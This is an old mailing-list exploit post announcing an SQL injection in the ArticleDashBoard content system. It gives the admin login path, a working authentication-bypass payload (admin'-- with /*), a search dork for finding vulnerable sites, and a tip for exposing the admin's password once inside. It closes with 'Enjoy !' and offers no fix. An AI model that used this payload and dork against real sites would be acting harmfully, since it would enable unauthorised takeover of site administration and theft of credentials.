Date: 15 Jan 2008 13:36:22 -0000
From: [email protected]
To: [email protected]Subject: Article DashBoard all version SQL Injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru
##########################################################################
# ArticleDashBoard all version SQL Injection Vulnerability #
# Homepage: http://articledashboard.com/ #
# Download: http://www.articledashboard.com/addxpc/ArticleDashboard.zip #
# SQL Injection Found by : #
# ^ Xcross87 | xcross87.info | hcegroup.net #
# Thanks to: ^ RongChauA | reaonline.net | rongchaua.net #
# Dork : Powered by Article DashBoard #
##########################################################################
SQL Injection Vulnerability :
Link admin: http://www.victim.com/[path]/admin/login.php
user | pass = admin'-- | /*
Boomsssssss ! Top right corner.." Logged in as 'admin' "
Note:
+ This source all is encrypted !
+ If admin setup mode: 'New Admin' , move mouse to the New Admin link you can see the password of the present admin account that you're logging in.
[^$^] Enjoy !
# - by Xcross87 | rongchaua #
